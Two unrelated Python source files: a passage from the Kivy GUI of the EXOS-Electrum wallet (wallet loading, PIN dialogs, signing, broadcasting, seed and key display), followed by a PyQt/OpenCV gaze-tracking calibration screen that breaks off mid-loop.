self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_exos.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_exos.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.perf_counter()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for exos: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard.run('new')
elif storage.is_encrypted():
raise Exception("Kivy GUI does not support encrypted wallet files.")
elif storage.requires_upgrade():
wizard.upgrade_storage(storage)
else:
raise Exception("unexpected storage file situation")
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of exos-electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_exos.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_exos.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/exos-electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum_exos.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' exo/byte'
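# Example (hypothetical numbers): a fee_rate of 1000 sat/kB is divided by 1000,
# so format_fee_satoshis(1.0) renders the result as roughly '1 exo/byte'.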
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('EXOS-Electrum', message,
app_icon=icon, app_name='EXOS-Electrum')
except ImportError:
Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
calibration.py
|
import sys
import threading
import cv2
import keyboard
import pyautogui
import pandas as pd
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import QImage, QPalette, QBrush
from PyQt5.QtWidgets import QWidget, QApplication
from playsound import playsound
from gaze_tracking import GazeTracking
# mouse event variables
sensitivity_x = 400
is_mouse_down = False
is_next = False
counting = 0
# audio playback function
def play_narrator(msg, file_name):
playsound("./audio/" + file_name + "_audio.mp3")
print(msg + ' is being played. - file name: [' + file_name + '_audio.mp3]')
class main(QWidget):
def __init__(self):
super().__init__()
self.setWindowTitle("Calibration")
"""변수 선언"""
self.titleClass = None
# current display size
self.screen_width, self.screen_height = pyautogui.size()
# initial camera setup
self.webCam = 1
self.gaze = GazeTracking()
self.counting = 0
# configured sensitivity
self.sens = None
self.load_sens() # initialize from the values stored in the file
# color table
self.color = {'gray': (153, 153, 153),
'green': (255, 149, 35),
'darkGray': (51, 51, 51),
'white': (255, 255, 255),
'red': (153, 153, 204)}
# sensitivity
self.sensitivity = 1 # (0~2)
# direction
self.direction = 0 # (0~3: up, down, left, right)
# rect start position, end position, text content and text position
self.rectLoc = [
[(700, 185), (750, 235), ("up", (710, 215))],
[(700, 245), (750, 295), ("down", (700, 275))],
[(700, 305), (750, 355), ("left", (706, 335))],
[(700, 365), (750, 415), ("right", (703, 395))]
]
"""버튼,라벨 생성"""
self.btn_next1 = QPushButton(self)
self.btn_next2 = QPushButton(self)
self.btn_next3 = QPushButton(self)
self.btn_next4 = QPushButton(self)
self.textLabel0 = QLabel(self)
self.textLabel1 = QLabel(self)
self.textLabel2 = QLabel(self)
self.textLabel3 = QLabel(self)
self.textLabel4 = QLabel(self)
self.textLabel5 = QLabel(self)
self.textLabel6 = QLabel(self)
self.textLabel7 = QLabel(self)
self.textLabel8 = QLabel(self)
"""버튼, 라벨 붙이기"""
# 다음 버튼
self.btn_next1.setText("다음")
self.btn_next1.setGeometry(900, 920, 200, 100) # x, y, 버튼 가로, 버튼 세로
self.btn_next1.clicked.connect(self.next_clicked)
self.btn_next1.setStyleSheet('border: 2px solid #d0d0d0; font: 30pt "배달의민족 을지로체 TTF"; border-radius: 20px; background-color: rgb(35, 149, 255); border-style: outset; color:white;')
# back button
self.btn_next4.setText("Back")
self.btn_next4.setGeometry(1800, 20, 100, 50) # x, y, button width, button height
self.btn_next4.clicked.connect(self.back_clicked)
self.btn_next4.setStyleSheet(
'border: 2px solid #d0d0d0; font: 14pt "배달의민족 을지로체 TTF"; border-radius: 20px; background-color: rgb(255, 0, 0); border-style: outset; color:white;')
# play button
self.btn_next2.setText("Play")
self.btn_next2.setGeometry(1150, 910, 200, 100) # x, y, button width, button height
self.btn_next2.clicked.connect(self.play_clicked)
self.btn_next2.setStyleSheet('border: 2px solid #d0d0d0; font: 30pt "배달의민족 을지로체 TTF"; border-radius: 20px; background-color: rgb(35, 149, 255); border-style: outset; color:white;')
# previous button
self.btn_next3.setText("Back")
self.btn_next3.setGeometry(650, 910, 200, 100) # x, y, button width, button height
self.btn_next3.clicked.connect(self.set_notice)
self.btn_next3.setStyleSheet('border: 2px solid #d0d0d0; font: 30pt "배달의민족 을지로체 TTF"; border-radius: 20px; background-color: rgb(35, 149, 255); border-style: outset; color:white;')
# sensitivity labels
self.textLabel1.setText(repr(self.sens['up']))
self.textLabel1.resize(1800, 80)
self.textLabel1.move(1000, 220)
self.textLabel1.setStyleSheet("font: 30pt Comic Sans MS")
self.textLabel2.setText(repr(self.sens['down']))
self.textLabel2.resize(1800, 80)
self.textLabel2.move(1020, 340)
self.textLabel2.setStyleSheet("font: 30pt Comic Sans MS")
self.textLabel3.setText(repr(self.sens['left']))
self.textLabel3.resize(1800, 80)
self.textLabel3.move(1020, 460)
self.textLabel3.setStyleSheet("font: 30pt Comic Sans MS")
self.textLabel4.setText(repr(self.sens['right']))
self.textLabel4.resize(1800, 80)
self.textLabel4.move(1040, 580)
self.textLabel4.setStyleSheet("font: 30pt Comic Sans MS")
# show the values read from the csv file
self.show_fix()
self.set_notice()
# threading
self.cam_th = threading.Thread(target=self.cameraON)
self.cam_trigger = False
print('def __init__')
def load_sens(self):
self.r_sens = pd.read_csv('./file/sensitivity.csv') # sensitivity values read from the file
self.sens = {'up': self.r_sens['up'], 'down': self.r_sens['down'], 'right': self.r_sens['right'], 'left': self.r_sens['left']}
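# Note (inferred from how the values are used later): pd.read_csv yields a DataFrame,
# so each entry of self.sens holds a whole pandas Series (one column), which is why
# later code reads scalar values as e.g. self.sens['up'][0].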
def valueHandler(self, value):
scaleValue = float(value) / 100
print(scaleValue, type(scaleValue))
def set_notice(self):
# set the background to fit the full screen
self.background_path = "./image/notice.png"
self.oImage = QImage(self.background_path)
self.sImage = self.oImage.scaled(QSize(self.screen_width, self.screen_height))
# set up the palette
self.palette = QPalette()
self.palette.setBrush(10, QBrush(self.sImage))
self.setPalette(self.palette)
self.textLabel1.setVisible(False)
self.textLabel2.setVisible(False)
self.textLabel3.setVisible(False)
self.textLabel4.setVisible(False)
self.btn_next1.setVisible(True)
self.btn_next4.setVisible(True)
self.btn_next2.setVisible(False)
self.btn_next3.setVisible(False)
self.cam_th = threading.Thread(target=self.cameraON)
self.cam_trigger = False
print('def set_notice')
def set_check(self):
# set the background to fit the full screen
self.background_path = "./image/check.png"
self.oImage = QImage(self.background_path)
self.sImage = self.oImage.scaled(QSize(self.screen_width, self.screen_height))
# set up the palette
self.palette = QPalette()
self.palette.setBrush(10, QBrush(self.sImage))
self.setPalette(self.palette)
self.textLabel1.setVisible(True)
self.textLabel2.setVisible(True)
self.textLabel3.setVisible(True)
self.textLabel4.setVisible(True)
self.btn_next1.setVisible(False)
self.btn_next4.setVisible(False)
self.btn_next2.setVisible(True)
self.btn_next3.setVisible(True)
self.textLabel1.setText(repr(self.sens['up'][0]))
self.textLabel2.setText(repr(self.sens['down'][0]))
self.textLabel3.setText(repr(self.sens['left'][0]))
self.textLabel4.setText(repr(self.sens['right'][0]))
print('def set_check')
# back button on the notice screen
def back_clicked(self):
self.titleClass.show()
self.hide()
def play_clicked(self):
'''# save the sensitivity settings to a file
with open("./file/sensitivity.txt", 'w') as f:
for k in self.sens.values():
f.writelines(str(k))'''
self.titleClass.show()
self.set_notice()
self.hide()
print('def play_clicked')
def open(self):
self.set_check()
self.update()
self.show()
print('def open')
'''def valueHandler(self, value):
pass'''
def cameraON(self):
self.webCam = cv2.VideoCapture(0)
self.cam_trigger = True
print('def cameraON')
def next_clicked(self):
global sensitivity_x
global is_mouse_down
global counting
self.hide()
self.cam_th.run()
# window setup
cv2.namedWindow("calibration", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("calibration", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
print('def next_clicked')
while True:
if self.cam_trigger is True:
_, camFrame = self.webCam.read()
camFrame = cv2.flip(camFrame, 1)
camFrame = cv2.resize(camFrame, dsize=(800, 600), interpolation=cv2.INTER_AREA)
# face measurement
self.gaze.refresh(camFrame)
camFrame = self.gaze.annotated_frame()
# top-left text
text = ""
text1 = ""
# if self.gaze.is_blinking():
# text = "Blinking"
if self.gaze.is_right():
text = "Looking right"
elif self.gaze.is_left():
text = "Looking left"
elif self.gaze.is_center():
text = "Looking center"
if self.gaze.is_up():
text1 = "Looking up"
elif self.gaze.is_down():
text1 = "Looking down"
elif self.gaze.is_center():
text1 = "Looking center"
cv2.putText(camFrame, text, (90, 60), cv2.FONT_HERSHEY_DUPLEX, 1.6, (147, 58, 31), 2)
cv2.putText(camFrame, text1, (90, 100), cv2.FONT_HERSHEY_DUPLEX, 1.6, (147, 58, 31), 2)
# bottom sensitivity base gray frame (number, circle, text, box, line, arrow line)
cv2.putText(camFrame, repr((sensitivity_x - 250) / 100), (385, 520), cv2.FONT_HERSHEY_DUPLEX, 0.6, self.color["green"], 1)
cv2.line(camFrame, (250, 550), (550, 550), self.color["gray"], 6)
# direction selection on the right
cv2.line(camFrame, (725, 190), (725, 400), self.color["gray"], 2)
cv2.arrowedLine(camFrame, (725, 155), (725, 105), self.color["gray"], 2, tipLength=0.5)
cv2.arrowedLine(camFrame, (725, 445), (725, 495), self.color["gray"], 2, tipLength=0.5)
# next button at the bottom right
cv2.rectangle(camFrame, (690, 535), (760, 565), self.color["green"], -1)
cv2.putText(camFrame, "next", (700, 555), cv2.FONT_HERSHEY_DUPLEX, 0.7,
self.color["white"], 1)
# init button at the bottom right
cv2.rectangle(camFrame, (590, 535), (660, 565), self.color["green"], -1)
cv2.putText(camFrame, "init", (609, 555), cv2.FONT_HERSHEY_DUPLEX, 0.7, self.color["white"], 1)
# back button at the bottom left
cv2.rectangle(camFrame, (100, 535), (170, 565), self.color["gray"], -1)
cv2.putText(camFrame, "back", (108, 555), cv2.FONT_HERSHEY_DUPLEX, 0.7, self.color["darkGray"], 1)
# slider selection circle
cv2.circle(camFrame, (sensitivity_x, 550), 10, self.color['green'], -1)
# move on to the next screen
global is_next
if is_next is True:
# on exit, release the webCam, close the window, and switch to the next screen.
self.webCam.release()
cv2.destroyAllWindows()
is_next = False
break
# rectangles on the 800x600 frame
for idx in range(len(self.rectLoc)):
if idx == self.direction:
